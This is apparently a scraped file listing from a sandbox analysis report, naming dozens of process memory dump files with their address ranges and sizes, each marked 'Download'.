memory/9788-1642-0x0000000000030000-0x000000000003D000-memory.dmp

Filesize
52KB

Download
memory/9788-1639-0x0000000003060000-0x0000000003061000-memory.dmp

Filesize
4KB

Download
memory/9820-1405-0x00000000001E0000-0x00000000001E1000-memory.dmp

Filesize
4KB

Download
memory/9824-872-0x00007FF81FB50000-0x00007FF81FB51000-memory.dmp

Filesize
4KB

Download
memory/9848-1613-0x00000000038D0000-0x00000000038D1000-memory.dmp

Filesize
4KB

Download
memory/10024-935-0x0000000005070000-0x0000000005071000-memory.dmp

Filesize
4KB

Download
memory/10024-929-0x0000000005050000-0x0000000005051000-memory.dmp

Filesize
4KB

Download
memory/10024-943-0x00000000050D0000-0x00000000050D1000-memory.dmp

Filesize
4KB

Download
memory/10024-950-0x00000000050F0000-0x00000000050F1000-memory.dmp

Filesize
4KB

Download
memory/10024-942-0x00000000050C0000-0x00000000050C1000-memory.dmp

Filesize
4KB

Download
memory/10024-975-0x0000000005110000-0x0000000005111000-memory.dmp

Filesize
4KB

Download
memory/10024-951-0x0000000005100000-0x0000000005101000-memory.dmp

Filesize
4KB

Download
memory/10024-896-0x0000000003921000-0x000000000394C000-memory.dmp

Filesize
172KB

Download
memory/10024-940-0x00000000050B0000-0x00000000050B1000-memory.dmp

Filesize
4KB

Download
memory/10024-917-0x0000000005000000-0x0000000005001000-memory.dmp

Filesize
4KB

Download
memory/10024-923-0x0000000005020000-0x0000000005021000-memory.dmp

Filesize
4KB

Download
memory/10024-921-0x0000000005010000-0x0000000005011000-memory.dmp

Filesize
4KB

Download
memory/10024-926-0x0000000005030000-0x0000000005031000-memory.dmp

Filesize
4KB

Download
memory/10024-944-0x00000000050E0000-0x00000000050E1000-memory.dmp

Filesize
4KB

Download
memory/10024-928-0x0000000005040000-0x0000000005041000-memory.dmp

Filesize
4KB

Download
memory/10024-932-0x0000000005060000-0x0000000005061000-memory.dmp

Filesize
4KB

Download
memory/10024-937-0x0000000005080000-0x0000000005081000-memory.dmp

Filesize
4KB

Download
memory/10024-939-0x00000000050A0000-0x00000000050A1000-memory.dmp

Filesize
4KB

Download
memory/10024-938-0x0000000005090000-0x0000000005091000-memory.dmp

Filesize
4KB

Download
memory/10200-905-0x00000000001F0000-0x00000000001F1000-memory.dmp

Filesize
4KB

Download
memory/10228-1169-0x00000000001C0000-0x00000000001C1000-memory.dmp

Filesize
4KB

Download
memory/10228-1170-0x0000000000400000-0x00000000015D7000-memory.dmp

Filesize
17.8MB

Download
memory/10228-1172-0x00000000001B0000-0x00000000001B1000-memory.dmp

Filesize
4KB

Download
memory/10284-1664-0x0000000002EF0000-0x0000000002EF2000-memory.dmp

Filesize
8KB

Download
memory/10284-1663-0x00007FF806C00000-0x00007FF8075A0000-memory.dmp

Filesize
9.6MB

Download
memory/10340-1720-0x0000000004800000-0x0000000004801000-memory.dmp

Filesize
4KB

Download
memory/10340-1709-0x00000000047B0000-0x00000000047B1000-memory.dmp

Filesize
4KB

Download
memory/10340-1721-0x0000000004810000-0x0000000004811000-memory.dmp

Filesize
4KB

Download
memory/10340-1715-0x00000000047F0000-0x00000000047F1000-memory.dmp

Filesize
4KB

Download
memory/10340-1712-0x00000000047D0000-0x00000000047D1000-memory.dmp

Filesize
4KB

Download
memory/10340-1713-0x00000000047E0000-0x00000000047E1000-memory.dmp

Filesize
4KB

Download
memory/10340-1711-0x00000000047C0000-0x00000000047C1000-memory.dmp

Filesize
4KB

Download
memory/10340-1707-0x0000000004790000-0x0000000004791000-memory.dmp

Filesize
4KB

Download
memory/10340-1708-0x00000000047A0000-0x00000000047A1000-memory.dmp

Filesize
4KB

Download
memory/10340-1705-0x0000000004770000-0x0000000004771000-memory.dmp

Filesize
4KB

Download
memory/10340-1706-0x0000000004780000-0x0000000004781000-memory.dmp

Filesize
4KB

Download
memory/10340-1702-0x0000000004740000-0x0000000004741000-memory.dmp

Filesize
4KB

Download
memory/10340-1704-0x0000000004760000-0x0000000004761000-memory.dmp

Filesize
4KB

Download
memory/10340-1703-0x0000000004750000-0x0000000004751000-memory.dmp

Filesize
4KB

Download
memory/10340-1701-0x0000000004730000-0x0000000004731000-memory.dmp

Filesize
4KB

Download
memory/10340-1700-0x0000000004720000-0x0000000004721000-memory.dmp

Filesize
4KB

Download
memory/10340-1698-0x0000000004700000-0x0000000004701000-memory.dmp

Filesize
4KB

Download
memory/10340-1699-0x0000000004710000-0x0000000004711000-memory.dmp

Filesize
4KB

Download
memory/10340-1694-0x0000000003021000-0x000000000304C000-memory.dmp

Filesize
172KB

Download
memory/10412-1617-0x0000000004A90000-0x0000000004A91000-memory.dmp

Filesize
4KB

Download
memory/10660-1662-0x0000000000F70000-0x0000000000F72000-memory.dmp

Filesize
8KB

Download
memory/10660-1661-0x00007FF806C00000-0x00007FF8075A0000-memory.dmp

Filesize
9.6MB

Download
memory/10792-1543-0x0000000005110000-0x0000000005111000-memory.dmp

Filesize
4KB

Download
memory/10792-1536-0x00000000050A0000-0x00000000050A1000-memory.dmp

Filesize
4KB

Download
memory/10792-1527-0x0000000002290000-0x0000000002291000-memory.dmp

Filesize
4KB

Download
memory/10792-1526-0x00000000008A0000-0x00000000008A1000-memory.dmp

Filesize
4KB

Download
memory/10792-1539-0x00000000050D0000-0x00000000050D1000-memory.dmp

Filesize
4KB

Download
memory/10792-1534-0x0000000005080000-0x0000000005081000-memory.dmp

Filesize
4KB

Download
memory/10792-1529-0x00000000022B0000-0x00000000022B1000-memory.dmp

Filesize
4KB

Download
memory/10792-1535-0x0000000005090000-0x0000000005091000-memory.dmp

Filesize
4KB

Download
memory/10792-1541-0x00000000050F0000-0x00000000050F1000-memory.dmp

Filesize
4KB

Download
memory/10792-1533-0x0000000005070000-0x0000000005071000-memory.dmp

Filesize
4KB

Download
memory/10792-1524-0x00000000039A1000-0x00000000039CC000-memory.dmp

Filesize
172KB

Download
memory/10792-1537-0x00000000050B0000-0x00000000050B1000-memory.dmp

Filesize
4KB

Download
memory/10792-1531-0x0000000005050000-0x0000000005051000-memory.dmp

Filesize
4KB

Download
memory/10792-1528-0x00000000022A0000-0x00000000022A1000-memory.dmp

Filesize
4KB

Download
memory/10792-1530-0x00000000023D0000-0x00000000023D1000-memory.dmp

Filesize
4KB

Download
memory/10792-1538-0x00000000050C0000-0x00000000050C1000-memory.dmp

Filesize
4KB

Download
memory/10792-1542-0x0000000005100000-0x0000000005101000-memory.dmp

Filesize
4KB

Download
memory/10792-1540-0x00000000050E0000-0x00000000050E1000-memory.dmp

Filesize
4KB

Download
memory/10792-1532-0x0000000005060000-0x0000000005061000-memory.dmp

Filesize
4KB

Download
memory/10812-1750-0x0000000000610000-0x0000000000611000-memory.dmp

Filesize
4KB

Download
memory/10912-1553-0x0000000002D00000-0x0000000002D02000-memory.dmp

Filesize
8KB

Download
memory/10912-1551-0x00007FF806C00000-0x00007FF8075A0000-memory.dmp

Filesize
9.6MB

Download
memory/10912-1592-0x0000000002D05000-0x0000000002D06000-memory.dmp

Filesize
4KB

Download
memory/10912-1575-0x0000000002D02000-0x0000000002D04000-memory.dmp

Filesize
8KB

Download
memory/10920-1770-0x00000000001E0000-0x00000000001E1000-memory.dmp

Filesize
4KB

Download
memory/11048-1562-0x0000000004AC0000-0x0000000004AC1000-memory.dmp

Filesize
4KB

Download
memory/11048-1564-0x0000000004AC0000-0x0000000004AC1000-memory.dmp

Filesize
4KB

Download
memory/11048-1560-0x00000000052C0000-0x00000000052C1000-memory.dmp

Filesize
4KB

Download
memory/11048-1579-0x00000000052C0000-0x00000000052C1000-memory.dmp

Filesize
4KB

Download
memory/11048-1577-0x0000000004AC0000-0x0000000004AC1000-memory.dmp

Filesize
4KB

Download
memory/11048-1581-0x0000000004AC0000-0x0000000004AC1000-memory.dmp

Filesize
4KB

Download
memory/11048-1558-0x0000000004AC0000-0x0000000004AC1000-memory.dmp

Filesize
4KB

Download
memory/11048-1584-0x0000000004AC0000-0x0000000004AC1000-memory.dmp

Filesize
4KB

Download
memory/11048-1586-0x0000000004AC0000-0x0000000004AC1000-memory.dmp

Filesize
4KB

Download
memory/11048-1549-0x0000000000AF0000-0x0000000000AF1000-memory.dmp

Filesize
4KB

Download
memory/11124-1546-0x00007FF806C00000-0x00007FF8075A0000-memory.dmp

Filesize
9.6MB

Download
memory/11124-1547-0x00000000028A0000-0x00000000028A2000-memory.dmp

Filesize
8KB

Download
memory/11184-1665-0x0000000001FC0000-0x0000000001FC1000-memory.dmp

Filesize
4KB

Download
memory/11208-1623-0x0000000000D10000-0x0000000000D11000-memory.dmp

Filesize
4KB

Download
memory/11208-1622-0x00007FFFFDEA0000-0x00007FFFFE88C000-memory.dmp

Filesize
9.9MB

Download
memory/11208-1627-0x000000001BBD0000-0x000000001BBD2000-memory.dmp

Filesize
8KB

Download
memory/11248-1669-0x00000000001E0000-0x00000000001E1000-memory.dmp

Filesize
4KB

Download
memory/11260-1724-0x0000000003030000-0x0000000003031000-memory.dmp

Filesize
4KB

Download